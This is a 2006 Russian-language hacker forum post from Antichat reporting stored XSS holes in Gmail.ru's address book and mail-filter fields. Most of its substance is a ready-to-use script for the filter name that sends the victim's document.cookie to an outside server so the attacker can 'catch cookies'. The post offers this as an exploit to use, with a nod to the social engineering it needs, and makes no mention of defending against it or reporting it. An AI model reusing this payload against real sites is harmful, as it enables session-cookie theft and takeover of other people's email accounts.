ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу XSS в Gmail.ru (алерт в адресной книге)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в Gmail.ru (в адресной книге и фильтрах)
  #1  
Старый 14.04.2006, 22:41
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


Post XSS в Gmail.ru (в адресной книге и фильтрах)
Заходим в адресную книгу и забиваем доволи знакомый скрипт алерта в поле для имени, домашнего телефона и места работы. При просмотре списка контактов Xss идёт в работу. Хотя больше чем алерт я оттуда не выжал =( Да и без соцИнж не обойтись =( Короче - шалость такая =)



А при создании нового фильтра в названии вбиваем любимый
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> И ловим кукисы... =) И опять тут без соц инженерии никуда =)
Последний раз редактировалось b00zy_c0d3r; 15.04.2006 в 16:30..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ